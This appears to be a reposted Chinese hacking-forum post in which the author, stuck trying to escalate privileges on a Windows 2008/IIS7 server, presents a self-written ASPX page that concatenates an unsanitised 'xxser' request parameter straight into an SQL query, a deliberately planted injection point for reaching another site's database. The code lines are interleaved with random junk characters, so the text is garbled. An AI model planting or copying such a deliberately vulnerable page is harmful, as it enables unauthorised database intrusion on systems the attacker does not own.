利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。
9 {5 c9 p5 ?1 P' L5 g, s8 f2 \  x
​
7 x. {) c8 D& ?/ Z5 R; j; ?<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
/ W+ C- D6 d% o: U$ w2 a' t1 D- E<html xmlns="http://www.w3.org/1999/xhtml">
! `% K% v  }7 V<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
3 h. s) t; I; }1 L) Y% q' ~</head>
' R  F8 i( A' M8 J  z3 c9 D* l<body>
    <form id="form1" runat="server">
: R6 @; S/ r/ c9 d# d    <div>
     <script language="c#" runat="server">
- `1 l" Z% {+ p( z" ~7 Y  W8 n            
& @& \' B. |5 Z3 c1 v! i1 K         void page_init(object sender, EventArgs e)
0 X  J1 Q4 v% s         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
$ r5 @  b9 A6 o8 e% P" G; y             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
9 C7 ]! ^  X# o  E  h             conn.Open();
5 ~  e+ s: b2 _8 v9 q            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
' Y2 }' L0 ]4 N6 i3 G! d1 j            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
8 a  r4 N. o, i; ?) b2 a             int x = command.ExecuteNonQuery();
' V0 r. {9 }; f# ]$ ?7 {7 P             Response.Write(i+"\n");
" D: R* D! d9 {( y5 `( `  N( t+ z             Response.Write(x);
2 M; }" A! T# P% E8 |% p. \# ]! r             conn.Close();
! a( l- J+ q9 _+ I5 `         }
     
  </script>
    </div>
% \$ Y$ P9 F  F8 V  a$ D! t4 M    </form>
</body>
  s1 ]  w& h1 G! m  ]2 t</html>
$ K4 j: r9 M! A3 ]6 u% ]